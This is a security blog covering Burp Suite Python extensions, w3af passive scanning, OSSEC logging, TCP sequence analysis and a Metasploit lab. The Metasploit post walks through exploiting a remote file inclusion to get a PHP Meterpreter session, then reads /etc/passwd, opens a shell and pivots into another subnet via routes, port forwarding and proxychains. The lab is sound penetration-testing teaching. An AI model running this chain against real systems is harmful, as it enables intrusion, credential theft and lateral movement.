David Robert's -castlebbs- Blog


Thursday 9 September 2010

Running w3af plugins in Burp Suite

I am quite enthusiastic about the Burp Suite Python extension I wrote. It is a Python (Jython) binding, written in Java, that implements the Burp Suite extension API.

In the to-do list, I mentioned that more examples needed to be written to show the benefit of having Python support in Burp Suite for writing extensions.

w3af is a web application attack and audit framework written in Python with a plugin-based model. I found it interesting to see what is involved in enabling Burp Suite to use w3af plugins.

As a demo/proof of concept, I created a BurpExtender.py Python extension that loads and executes w3af plugins within Burp Suite.

Not all w3af plugins can be used in Burp, mainly because of limitations of the BurpExtender API. So for the moment, only plugins from the grep and evasion categories are supported.

While I may look at implementing other plugin categories, having access to the grep plugins is already nice: all the traffic going through Burp is passively scanned by the plugins, and weaknesses are reported in the Alerts tab and in the console.
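To make concrete what a grep plugin does with the traffic, here is an added example, written in plain Python 3 for this page and not code from w3af or from the Burp extension: three simplified checks in the spirit of grep.privateIP, grep.strangeHTTPCode and grep.errorPages, run over a constructed HTTP response. The regular expressions, the list of "common" status codes, the error signatures and the sample response are my own assumptions, not w3af's.

```python
import re

# Constructed sample response (not captured traffic). It carries three things a
# passive check would flag: an unusual status code, an RFC 1918 address in a
# header and a Java stack trace in the body.
SAMPLE_RESPONSE = (
    "HTTP/1.1 599 Backend Failure\r\n"
    "Server: Apache/2.2.9 (Fedora)\r\n"
    "X-Backend: 10.0.12.7:8080\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body><pre>\n"
    "java.lang.NullPointerException\n"
    "\tat com.example.Handler.doGet(Handler.java:42)\n"
    "</pre></body></html>\n"
)

CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>Hello all!</body></html>\n"
)

# RFC 1918 ranges; the word boundaries avoid matching inside longer numbers.
PRIVATE_IP = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3})\b"
)
# Status codes seen every day (assumed list); anything else is worth a look.
COMMON_CODES = {200, 201, 204, 301, 302, 303, 304, 307,
                400, 401, 403, 404, 405, 500, 502, 503}
# Signatures of verbose error pages (assumed patterns, not w3af's list).
ERROR_SIGNATURES = [
    re.compile(r"java\.lang\.\w+(?:Exception|Error)"),
    re.compile(r"Traceback \(most recent call last\)"),
    re.compile(r"<b>(?:Warning|Fatal error)</b>: .*? on line \d+"),
    re.compile(r"ORA-\d{5}"),
]


def split_response(raw):
    """Split a raw HTTP response into (status_code, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def grep_private_ip(status, headers, body):
    # Headers matter as much as the body: reverse proxies often leak backends there.
    text = "\n".join("%s: %s" % kv for kv in headers.items()) + "\n" + body
    return ["private IP disclosed: %s" % ip
            for ip in sorted(set(PRIVATE_IP.findall(text)))]


def grep_strange_http_code(status, headers, body):
    if status not in COMMON_CODES:
        return ["unusual HTTP status code %d" % status]
    return []


def grep_error_pages(status, headers, body):
    return ["error page signature: %s" % m.group(0)
            for sig in ERROR_SIGNATURES for m in [sig.search(body)] if m]


# name -> check, mirroring the 'category.plugin' naming used in BurpExtender.py
GREP_PLUGINS = {
    "grep.privateIP": grep_private_ip,
    "grep.strangeHTTPCode": grep_strange_http_code,
    "grep.errorPages": grep_error_pages,
}


def passive_scan(raw_response, plugins=GREP_PLUGINS):
    """Run every grep check over one response; returns [(plugin, detail), ...]."""
    status, headers, body = split_response(raw_response)
    findings = []
    for name, check in plugins.items():
        for detail in check(status, headers, body):
            findings.append((name, detail))
    return findings


if __name__ == "__main__":
    for name, detail in passive_scan(SAMPLE_RESPONSE):
        print("[%s] %s" % (name, detail))
```

In the real extension each response that Burp hands to processProxyMessage would go through the equivalent of passive_scan, and each finding would be raised with the callbacks' issueAlert. Note that the checks never touch the request: a grep plugin is purely passive, which is exactly why it fits the proxy callback model.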

How to use it:
  1. Download the BurpSuite w3af plugin
  2. Follow the instructions for the installation of the Burp suite Python extension
  3. Select which plugins you want to use. This is done in the first lines of BurpExtender.py:
# Here you define the name of the plugins you want (category.plugin)
plugins = ['grep.domXss',  'grep.error500', 'grep.errorPages', 'grep.feeds',  
           'grep.fileUpload','grep.hashFind', 'grep.httpAuthDetect', 'grep.privateIP', 'grep.ssn',
           'grep.strangeHeaders', 'grep.strangeHTTPCode', 'grep.strangeReason', 'grep.svnUsers', 'grep.wsdlGreper']

You also need to specify the path of the w3af Python modules. I have tested this program with w3af version 1.0-rc3.

# Here you should define the location of your w3af installation
w3afPath="C:\\local\\Program Files\\w3af\\w3af"
# Example for Unix "/usr/local/w3af/w3af"
  4. Start Burp (example below on Windows):
C:\Burp>java -Xmx512m -classpath burpsuite_v1.3.03.jar;burppython.jar burp.StartBurp
init: Bootstrapping class not in Py.BOOTSTRAP_TYPES[class=class org.python.core.PyStringMap]
BurpExtender.py needs to be in a folder listed below:
['C:\\Burp\\Lib', '/C:/Burp/burppython.jar/Lib', '__classpath__', '__pyclasspath__/']
loading w3af plugins
Loading grep.domXss...                     Success
Loading grep.error500...                   Success
Loading grep.errorPages...                 Success
Loading grep.feeds...                      Success
Loading grep.fileUpload...                 Success
Loading grep.hashFind...                   Success
Loading grep.httpAuthDetect...             Success
Loading grep.privateIP...                  Success
Loading grep.ssn...                        Success
Loading grep.strangeHeaders...             Success
Loading grep.strangeHTTPCode...            Success
Loading grep.strangeReason...              Success
Loading grep.svnUsers...                   Success
Loading grep.wsdlGreper...                 Success

Failed plugins are ignored and won't be processed. You can uncomment
the line 'print str(e)' in the module to see the actual exception

While browsing, if issues are passively identified, they appear in the console and in the Alerts tab:


A few remarks:

  • As stated previously, not all plugin categories are supported. I may look at this in the future; please email me if you need it.
  • I probably need to put more work into the evasion plugin support, since there are some issues with the order in which the HTTP headers are sent back to Burp.
  • Some grep plugins won't work out of the box because they require the sqlite3 Python module, which is not available in the Java implementation of Python used by the extension (Jython). It is however possible to get this working using the SQLite JDBC driver. Please drop me an email if you need help implementing this so that all plugins work.

Please give me some feedback if you try it: david@ombrepixel.com

Monday 30 August 2010

Extending Burp Suite in Python

In a previous post, I wrote about creating a Burp Suite extension in Java using the IBurpExtender interface. When performing web application security testing, I often need to write small pieces of code to help me automate some tasks, and this code is generally specific to the application I am testing. While I like Java, I think dynamically typed languages are more efficient for creating small pieces of code quickly. However, don't misquote me: dynamically typed languages like Python can also be (and are) used for very large development projects.

Having used Python for about 8 years now, I found the idea of creating a Python binding for Burp Suite very interesting. Since Burp is written in Java, I naturally used Jython, the Java implementation of Python.

My goal was to allow anyone to write Burp extensions directly in Python using the same BurpExtender interface. Therefore, if you have written Burp extensions in Java, you already know how to write them in Python.

First example

This very simple extension replaces the string "java" with "python" in all HTTP responses received by Burp. It is useless, but it shows how easy it is to write an extension in Python. Only these few lines of code are needed:

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    # Called by Burp for every request and response going through the proxy
    def processProxyMessage(self, messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            # 'message' is a Java byte[]; tostring() gives a Python str we can edit
            message = message.tostring().replace("java", "python")
        return message

Embedding an interactive python interpreter

Let's look at something a bit more interesting: using an interactive Python console to work on some of the messages processed by Burp:

from burp import IBurpExtender
from java.net import URL
from code import InteractiveConsole

class BurpExtender(IBurpExtender):
    def processProxyMessage(self, messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            # Rebuild a full URL from the callback arguments so it can be checked against the scope
            uUrl = URL("HTTPS" if serviceIsHttps else "HTTP", remoteHost, remotePort, url)
            if self.mCallBacks.isInScope(uUrl):
                message = message.tostring()
                from pprint import pprint
                # Hand the whole local namespace (message, self, url, ...) to the console
                loc = locals()
                c = InteractiveConsole(locals=loc)
                c.interact("Interactive python interpreter")
                # Copy back anything modified in the console (e.g. an edited message)
                for key in loc:
                    if key != '__builtins__':
                        exec "%s = loc[%r]" % (key, key)
        return message

    def registerExtenderCallbacks(self, callbacks):
        # Keep the callbacks object: it gives access to scope, proxy history, alerts, etc.
        self.mCallBacks = callbacks

What this code basically does is launch a Python interpreter and make the whole Python namespace available (you can access and modify any field and method offered by the BurpExtender object). Is this not cool?

Only messages in the Burp Suite scope (Target/Scope tab in Burp) are intercepted and made available interactively. This is done by the line:

 if self.mCallBacks.isInScope(uUrl):

isInScope is a callback function; the mCallBacks object is registered by the registerExtenderCallbacks Python method.

Below is an example of what is available in the interactive shell. The shell opens on the console used to start Burp Suite: when a message is in scope, the shell is launched.

First, we are within the scope of the processProxyMessage method and have direct access to its arguments.

Interactive python interpreter
>>> pprint(dir())

>>> pprint(message)
'HTTP/1.1 200 OK\r\nDate: Mon, 30 Aug 2010 12:16:40 GMT\r\nServer: Apache/2.2.9 (Fedora)\r\nLast-Modified: Mon, 30 Aug 2010 11:12:52 GMT\r\nETag: "2aa3a-4d-48f088ba1f500"\r\nAccept-Ranges: bytes\r\nContent-Length: 77\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html>\n<head>\n<title>Test!</title>\n</head>\n<body>\nHello all!\n</body>\n</html>\n'

>>> print resourceType, responseContentType, statusCode
html text/html; charset=utf-8 200

It is also possible to interact with all the BurpExtender fields and methods:

>>> pprint(dir(self))

It is possible, for example, to call any Burp method provided by the callback object:

>>> for message in self.mCallBacks.getProxyHistory():
...     message.getRequest().tostring()
'GET /test.html HTTP/1.1\r\nHost:\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008121622 Fedora/3.0.5-1.fc9 Firefox/3.0.5\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nProxy-Connection: keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

Adding new options in Burp Suite menus

This only works with the Professional version of Burp Suite (minimum 1.3.07).

Now I am going to show how to create a new menu item within Burp that calls new functions written in Python. The code below adds a "Compare parameters" item to the Burp Suite context menu. In the Proxy/History tab, you can select two messages, right-click and select the new compare function. This code is just an example of what can be done: it compares the GET and POST parameters of two requests and reports the differences. It can be useful, though, because the Burp Suite Comparer is not great for comparing requests.

from burp import IBurpExtender
from burp import IMenuItemHandler

from cgi import parse_qs

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks
        # The handler is called with the messages selected when the item is clicked
        self.mCallBacks.registerMenuItem("Compare parameters", ArgsDiffMenuItem())

class ArgsDiffMenuItem(IMenuItemHandler):
    def menuItemClicked(self, menuItemCaption, messageInfo):
        print "--- Diff on arguments ---"
        if len(messageInfo) == 2:
            # We can do a diff: getRequest() returns the raw request as a Java byte[]
            request1 = HttpRequest(messageInfo[0].getRequest().tostring())
            request2 = HttpRequest(messageInfo[1].getRequest().tostring())
            get1, post1 = request1.getParameters()
            get2, post2 = request2.getParameters()
            print "Diff in GET parameters:"
            self.diff(get1, get2)
            print "Diff in POST parameters:"
            self.diff(post1, post2)
        else:
            print "You need to select two messages to do an argument diff"
        print "\n\n"

    def diff(self, params1, params2):
        for param in params1:
            if param not in params2:
                print "Param %s=%s is not in the second request" % \
                      (param, params1[param])
            elif params1[param] != params2[param]:
                print "Request1 %s=%s Request2 %s=%s" % \
                        (param, params1[param], param, params2[param])
        for param in params2:
            if param not in params1:
                print "Param %s=%s is not in the first request" % \
                      (param, params2[param])

class HttpRequest:
    def __init__(self, request):
        # Split the raw request into request line, headers and body
        head, sep, self.body = request.partition("\r\n\r\n")
        lines = head.split("\r\n")
        self.method, self.url = lines[0].split(" ")[0:2]
        self.headers = lines[1:]

    def getParameters(self):
        # get url parameters: everything after '?' in the request line
        query = ""
        if "?" in self.url:
            query = self.url.split("?", 1)[1]
        getParams = parse_qs(query, keep_blank_values=True)

        # get body parameters (application/x-www-form-urlencoded only;
        # multipart or JSON bodies would need their own parser)
        postParams = parse_qs(self.body, keep_blank_values=True)

        return getParams, postParams
How to use the python extension

You need the burppython.jar extension. I have created a jar file that contains the Jython interpreter, so you don't need to install anything else.


  1. Download the zip file attached at the end of this article.
  2. Unzip its content into a dedicated folder.
  3. Copy the Burp Suite jar file into this folder (something like burpsuite_pro_v1.3.07.jar or burpsuite_v1.3.03.jar).
  4. Place the Python extension (BurpExtender.py) in the Lib subfolder.
  5. Launch Burp Suite using suite.bat or suite.sh.

Please send me an email to david@ombrepixel.com for any questions

To be done

A lot remains to be done:

  1. Add the capability to use several Python and Java extensions at the same time and link them together
  2. Add the capability to dynamically reload a Python extension without having to stop and restart Burp
  3. Put the project on a version control system like GitHub
  4. Add more demos leveraging the numerous Python libraries that already exist. UPDATE: please see the w3af extension
  5. ..

Tuesday 27 July 2010

Metasploit 3.4.1: PHP Meterpreter

Only two months after version 3.4.0 of the framework, version 3.4.1 has been released with a large number of new features.

Among the new features, I found this one really interesting:

  • PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system

Meterpreter is an advanced post-exploitation system and one of the best features of Metasploit. If you don't know what it is, I recommend having a look at the following:

Below is an example of how to launch a Meterpreter session by exploiting a Remote File Inclusion vulnerability in a PHP application. For the purpose of this test, I used the vulnerable version of Autonomous LAN party:

  • My "metasploit server" is on
  • The "vulnerable linux server" hosting the vulnerable web application is on, it is also connected to another subnet: not accessible by the Metasploit server
  • There is a windows "server" on the other subnet:
               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9925 updated yesterday (2010.07.25)

msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set SRVHOST
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp

We use the generic unix/webapp/php_include exploit with the php/meterpreter/bind_tcp payload, and then run it:

msf exploit(php_include) > exploit
[*] Started bind handler

[*] Using URL:
[*] PHP include server started.
[*] Sending stage (35521 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-07-27 00:12:04 +0100

meterpreter >

We now have a Meterpreter session. Here are examples of commands supported by the PHP Meterpreter:

meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts
       localhost
       castlebbs-vulnerables.localdomain       castlebbs-vulnerable
  windows-server.localdomain  windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd

We can obtain a shell:

meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps

The Meterpreter for Windows includes many more functions that don't make sense in the context of PHP exploitation (e.g. DLL injection, migration, etc.). But the really good thing about the PHP Meterpreter is that it has fully functional support for port forwarding and also enables the creation of new routes. For instance, having exploited an RFI in our web application, we can pivot through the web server and pen-test the Windows server on the other subnet, still from our Metasploit server.

First, let's have a look at the capability to add a new route:

msf exploit(php_include) > sessions -l

Active sessions

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable ->

msf exploit(php_include) > route add 1
msf exploit(php_include) > route print

Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------      Session 1

It must be understood at this stage that this route is not added to the operating system routing table, but to the framework itself. It means that most auxiliary modules and exploits will work directly, with their network traffic routed through the Meterpreter session. Below is an example of using scanner/smb/smb_version against the routed host:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run

[*] is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then let's have a look at the port forwarding capability. While the routing capability of Metasploit is nice, as said previously it is not a route defined at the operating system level on the Metasploit server, which means that no software except Metasploit can reach the routed host directly. The command below forwards local port 222 (on the Metasploit server) to port 22 of the vulnerable Linux server.

meterpreter > portfwd add -L -l 222 -r -p 22
[*] Local TCP relay created: <->

Because we did not upload a custom SSH server, we need to know the credentials to log in (or let's say scanner/ssh/ssh_login was successful). Running this command:

ssh -p 222 localhost -l user

will actually open an SSH session on the vulnerable Linux server; this is the port forwarding. But it gets better: we can use the SSH port forwarding options to reach the ports of the Windows server directly. In the example below, local port 445 is forwarded to port 445 on the Windows server, so SMB tools can be run locally.

ssh -L 445: -p 222 user@localhost

And to top it all off, we can use the SSH dynamic port forwarding option (-D, see man ssh) with proxychains on the Metasploit host, so that all traffic is redirected to the vulnerable Linux server acting as a SOCKS proxy, enabling full access to the subnet(s) it is connected to.

Proxychains configuration (the default):
socks4 9050

# ssh -D 9050  -p 222 user@localhost
# proxychains nmap -sV
# proxychains msfconsole # haha this even worked - but maybe not very useful since metasploit has the route option

Thursday 13 May 2010

OSSEC active response with linux: logging dropped packets

OSSEC is a great piece of software. When you understand well how it works, you can consider using active responses so that it really acts like a Host-based Intrusion Prevention System.

There are a number of risks in enabling active responses; more details are on the active-responses page:

  • Abuse by attackers as a denial-of-service attack (triggering a response for a large number of legitimate IPs, for instance using IP spoofing).
  • False positives: the configuration needs to be well fine-tuned regarding which levels and/or rules will trigger an active response.

But once the risks are understood, it can be a great active defense tool, for example blocking brute-force attacks in real time.

Custom active responses can be written. OSSEC comes with a set of active response scripts for Linux; one of them is firewall-drop.sh, which adds new rules to the Linux firewall (iptables) to drop the packets.

This entry describes how to enable logging of dropped packets. I find it useful to know whether the response is effective: what packets are being blocked after the response is triggered, how long the attack continues, etc. This information is useful to tune the active-response timeout.

If, like me, you want logging enabled, since there is no option for that, I propose a patch for firewall-drop.sh:

As shown on the Splunk chart above, it is possible to check that the active response timeouts are correct for the majority of attack scenarios. At the bottom, in yellow, are the active responses: the first bar is when OSSEC started to block the IP, the second one is when OSSEC removed the firewall rules, hence unblocking the IP. At the top, in blue, are the attacker's packets being dropped after the active response was enabled.

This patch works with OSSEC version 2.4.1.
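Since the point of logging the dropped packets is to tune the timeout, here is an added example (my own Python 3 script, not part of OSSEC or of the patch) that correlates the firewall-drop.sh add/delete entries from active-responses.log with the kernel LOG lines and later sshd failures for the same source address, to answer the two questions above: how long the attacker kept hammering after the block, and whether he came back once the rule was removed. The log excerpts are constructed; the LOG prefix "ossec-drop: " and the active-responses.log field layout are assumptions; and the syslog lines are assumed to be on the same clock as the active-responses log.

```python
import re
from datetime import datetime

# Constructed log excerpts (not real logs). Formats assumed:
#  - active-responses.log: "<date> <script> <action> <user> <ip> <timestamp> <rule id>"
#  - syslog kernel lines written by an iptables LOG rule with prefix "ossec-drop: "
#  - an sshd failure, to see whether the attacker comes back once unblocked
ACTIVE_RESPONSES_LOG = """\
Thu May 13 10:00:00 UTC 2010 /var/ossec/active-response/bin/firewall-drop.sh add - 203.0.113.5 1273744800.0 5712
Thu May 13 10:10:00 UTC 2010 /var/ossec/active-response/bin/firewall-drop.sh delete - 203.0.113.5 1273744800.0 5712
"""
SYSLOG = """\
May 13 10:00:01 vuln kernel: ossec-drop: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=22
May 13 10:00:03 vuln kernel: ossec-drop: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=22
May 13 10:04:30 vuln kernel: ossec-drop: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=22
May 13 10:13:00 vuln sshd[1234]: Failed password for root from 203.0.113.5 port 40004 ssh2
"""

YEAR = 2010  # syslog lines carry no year; assume the same year as the active-responses log

AR_LINE = re.compile(r"^(\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (\d{4}) \S+ (add|delete) \S+ (\d+\.\d+\.\d+\.\d+)")
DROP_LINE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: (?:\[ *[\d.]+\] )?ossec-drop: .*\bSRC=(\d+\.\d+\.\d+\.\d+)")
SSH_FAIL_LINE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: Failed password for .* from (\d+\.\d+\.\d+\.\d+)")


def parse_ar_time(stamp, year):
    # "Thu May 13 10:00:00" plus the year captured from the same line
    return datetime.strptime("%s %s" % (stamp, year), "%a %b %d %H:%M:%S %Y")


def parse_syslog_time(stamp, year):
    return datetime.strptime(stamp, "%b %d %H:%M:%S").replace(year=year)


def analyse(ar_log, syslog, year=YEAR):
    """Per blocked IP: when the rule went in and out, what was dropped meanwhile,
    and whether the attacker was back after the rule was removed."""
    report = {}
    for line in ar_log.splitlines():
        m = AR_LINE.match(line)
        if not m:
            continue
        when = parse_ar_time(m.group(1), int(m.group(2)))
        entry = report.setdefault(m.group(4), {"blocked_at": None, "unblocked_at": None,
                                                "dropped": 0, "last_drop": None,
                                                "attempts_after_unblock": 0})
        entry["blocked_at" if m.group(3) == "add" else "unblocked_at"] = when

    for line in syslog.splitlines():
        m = DROP_LINE.match(line)
        if m and m.group(2) in report:
            entry = report[m.group(2)]
            when = parse_syslog_time(m.group(1), year)
            entry["dropped"] += 1
            entry["last_drop"] = max(entry["last_drop"] or when, when)
            continue
        m = SSH_FAIL_LINE.match(line)
        if m and m.group(2) in report:
            entry = report[m.group(2)]
            when = parse_syslog_time(m.group(1), year)
            if entry["unblocked_at"] and when > entry["unblocked_at"]:
                entry["attempts_after_unblock"] += 1

    for entry in report.values():
        # Derived numbers that decide whether the configured timeout is long enough
        if entry["blocked_at"] and entry["unblocked_at"]:
            entry["timeout_seconds"] = int((entry["unblocked_at"] - entry["blocked_at"]).total_seconds())
        if entry["blocked_at"] and entry["last_drop"]:
            entry["attack_lasted_seconds"] = int((entry["last_drop"] - entry["blocked_at"]).total_seconds())
    return report


def timeout_is_sufficient(entry):
    """True when the attacker had stopped before the block expired and did not come back."""
    return (entry.get("attack_lasted_seconds", 0) < entry.get("timeout_seconds", 0)
            and entry["attempts_after_unblock"] == 0)


if __name__ == "__main__":
    for ip, entry in analyse(ACTIVE_RESPONSES_LOG, SYSLOG).items():
        verdict = "timeout OK" if timeout_is_sufficient(entry) else "timeout too short"
        print(ip, entry, verdict)
```

In the constructed data the dropped packets stop 270 seconds into a 600-second block, which looks fine on its own, but the same source is back with a failed login three minutes after the rule was removed: the timeout is too short for that attacker. Without the LOG rule the first half of that picture (how long the drops lasted) would be invisible.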

Wednesday 6 May 2009

Lotus Notes/Domino Security

From: http://www.securityfocus.com/archive/101/492134

Here's a list of useful resources on Lotus Domino/Notes security:

http://seclists.org/pen-test/2002/Nov/0034.html (whole thread)
http://seclists.org/pen-test/2007/Jul/0111.html (whole thread)

Some testing tools:

http://www.appsecinc.com/products/appdetective/domino/ (commercial!)
http://www.rapid7.com/nexpose/features.jsp (commercial!)
Other commercial password crackers from Elcomsoft/Passware/etc.

And some exploits:


Wednesday 9 May 2007

Metasploit self-training

If part of your job is about security, or if it is a hobby, you have probably heard about the Metasploit project. This tool will help you during penetration testing: you can try known exploits and create your own tools.

There was an interesting thread on the pen-test mailing list regarding resources freely available on the Internet to learn how to use Metasploit. Here is a summary of the links provided on the list:

  • Official documentation:
  • User guide:
  • The metasploit book :
  • Article on Security Focus (maybe a little bit outdated) :
  • Demos on milw0rm :
  • Flash tutorial:
  • A few videos :

Wednesday 21 March 2007

scapy vs hping3: ISN distribution spectrogram

scapy and hping3 are network packet manipulation tools. They are Swiss army knives for crafting, sending and receiving packets. Being particularly interested in Python, I naturally looked into scapy. Other tools and libraries exist for Python (for example impacket, pcapy); I will present them in other posts. hping3 is another very powerful tool embedding a Tcl interpreter, so I was interested in comparing these two products. This post presents the beginning of my comparison and is not meant to be exhaustive on the subject. It is just here to record my first impressions.

To start my comparison, I decided to rewrite in Python/Scapy the isn-spectrogram program written in Tcl/hping3. Packet creation, sending and receiving were rewritten with scapy, and the graphical window with Tkinter (isn-spectrogram uses Tk, so the port was easy :-)). This program analyses the sequence numbers returned by the target when a TCP connection is initiated. It draws a spectrogram representing the distribution of the differences between the sequence numbers returned in successive packets. These differences correspond to random increments: the wider the spectrum, the harder it is to predict the sequence numbers.
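The analysis step of that program (without the scapy part that sends the SYNs and collects the SYN/ACKs, and without the Tk window), as an added Python 3 example that is not the post's code or the original isn-spectrogram: it takes a list of collected ISNs, computes the consecutive differences modulo 2^32, bins them over the 32-bit range and counts how many bins are occupied, which is the "width" of the spectrum the post talks about. The two ISN sequences are constructed to imitate a fixed-increment generator and a random one; the bin count, the step of 64000 and the seed are my own choices, not measurements of any real stack.

```python
import random

BINS = 64          # number of columns in the "spectrogram"
MODULUS = 1 << 32  # TCP sequence numbers are 32-bit


def isn_deltas(isns):
    """Differences between consecutive ISNs, modulo 2^32 (wrap-around is normal)."""
    return [(b - a) % MODULUS for a, b in zip(isns, isns[1:])]


def spectrum(deltas, bins=BINS):
    """Histogram of the deltas over the 32-bit range: how many fell in each bin."""
    counts = [0] * bins
    for d in deltas:
        counts[d * bins // MODULUS] += 1
    return counts


def spectral_width(counts):
    """Occupied bins: 1 for a constant increment, close to 'bins' for random ISNs."""
    return sum(1 for c in counts if c)


def render(counts, height=8):
    """Text rendering of the spectrogram, one column per bin (stands in for the Tk window)."""
    peak = max(counts) or 1
    rows = []
    for level in range(height, 0, -1):
        rows.append("".join("#" if c * height / peak >= level else " " for c in counts))
    return "\n".join(rows)


# Constructed ISN sequences, imitating two kinds of generator (assumed behaviours):
def constant_increment_isns(n, start=123456, step=64000):
    # Old BSD-style: the ISN grows by a fixed amount per connection, trivially predictable
    return [(start + i * step) % MODULUS for i in range(n)]


def random_isns(n, seed=7):
    # Modern stacks: the ISN looks uniformly random to an outside observer
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(n)]


if __name__ == "__main__":
    for name, isns in (("constant increment", constant_increment_isns(500)),
                       ("random", random_isns(500))):
        counts = spectrum(isn_deltas(isns))
        print("%s: %d/%d bins occupied" % (name, spectral_width(counts), BINS))
        print(render(counts))
```

With a real target, the isns list is what the scapy loop collects from the seq field of each SYN/ACK; everything else stays the same. The constant-increment generator lights a single column, the random one fills nearly all 64, which is the difference between the two spectrograms shown below.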

Linux 2.4.27 spectrogram:


Spectrogram of a Zyxel router (!):


Saturday 24 February 2007

Reliability of Software Inspector

In the previous post, I talked about Secunia Software Inspector. After a fairly positive first impression, I found that, well... it is better than nothing, but it is not a very reliable piece of software:

  • To determine the Windows update level, the application relies on Windows Update. If for any reason the servers cannot be reached, Software Inspector will tell you that your Windows is up to date and that all security updates are installed, even if that is not the case. I contacted Secunia to report this more than annoying bug.
  • I tested a PC running XP with Firefox installed. Software Inspector tells me it is OK and that I have the most up-to-date version. However, a newer version, which fixes security problems, has been released.

For the second point, this needs to be put in perspective: the new version has only just been released (a few hours ago), and we will see how long Secunia takes to account for it.

The first point is much more annoying, especially since there are many reasons why your system may not be able to connect to Windows Update: network problems, firewall rules, but also and above all antivirus or personal firewall products (Sophos, McAfee VirusScan, etc.) that block the svchost.exe process by default. Yet this is the generic process that connects to the Windows Update servers.

What is worse than having a vulnerable system? Having a vulnerable system and believing it is not.

Edit of 27/02/07

  • For the first point, a Bugtraq ID has been created: Secunia Software Inspector Security Update Verification Weakness http://www.securityfocus.com/bid/22736
  • For the second point, I got a reply from Secunia informing me that the version has been added to the Software Inspector signature database.

Wednesday 21 February 2007

Secunia Software Inspector

An online tool that checks the versions of installed software and reports known vulnerabilities.

For Windows users who are not quite sure where they stand regarding the vulnerabilities of their installed applications (as well as the Windows update level).

It recognises a limited number of applications, but it is not bad, it is free, and there is nothing to install on the machine being analysed. The report even provides the instructions to follow to update the vulnerable software, as well as a link to the vulnerability description on the Secunia site.


Is it safe to use this online service?

You run an applet signed by Secunia that can potentially do a lot of things on your system. The question to ask is: do you trust Secunia? My opinion is that if you are asking yourself the question, you do not need to use this service :-) : you are aware of security issues and therefore you know how to update your software.

Tuesday 13 February 2007

CP8 smartcard reader: explore the carte bleue (credit card)

Photo of the reader

I bought a second-hand smart card reader for 1 euro in a shop in Toulouse. This fairly old reader works perfectly under Linux, and I decided to write this page to describe the work I have done around it.

See the photos of the reader

The author cannot under any circumstances be held responsible for any loss or damage of any kind that may result from the use of these explanations or programs.

